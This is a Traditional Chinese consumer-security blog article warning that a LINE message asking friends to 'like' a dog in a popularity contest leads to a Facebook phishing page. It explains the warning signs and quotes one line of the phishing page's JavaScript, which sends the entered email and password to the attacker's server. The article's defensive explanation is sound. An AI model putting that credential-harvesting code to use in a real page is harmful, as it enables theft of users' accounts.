「朋友家狗狗參加人氣比拼，幫忙讚一下」是釣魚網站，小心帳號被盜

文 / 小Mic
最近一些Line好友傳來這則訊息「朋友家狗狗參加人氣比拼，幫忙讚一下，感恩」，要你點網址去幫忙按讚，由於是好友，且投票網站乍看之下似乎很正常，所以很容易就相信。但明明臉書已經是登入狀態，按讚後還是要你輸入帳號密碼，就很有問題。從電腦連結該網址，檢查原始碼後發現，果然是釣魚網站，輸入帳號密碼恐怕帳號被盜。

Line好友傳來這則訊息，經確認非本人自願性傳送，應是Line帳號曾點到惡意連結導致自動傳送


投票網站乍看之下似乎很正常


但明明臉書已經是登入狀態，按讚之後還是要你輸入臉書帳號及密碼


手機上看不出異樣，以電腦連結該網址可以看到一個很陽春的網站


臉書已經是登入狀態，按讚後還是跳出輸入臉書帳密視窗


在輸入帳密視窗按右鍵 → 顯示為分頁


此時輸入帳密視窗展開為分頁


檢視原始碼


看到這串回傳物件語法，帳號及密碼輸入後則回傳到伺服器（此時帳號被盜）

document.location = "ashx/login.ashx?email=" + email + "&pass=" + pass;

document.location 為回傳文件的 location 物件 (object) 語法


其他可疑之處


此網站看起來很陽春，沒有任何網站宣告


而且按讚數全都是0（假網頁）


而且按讚數全都是0（假網頁）



愛貓愛狗人士請小心！

延伸閱讀:
「15歲少女在Facebook上露胸後自殺」小心帳號成為病毒推手
Line免費貼圖？當心個資外洩！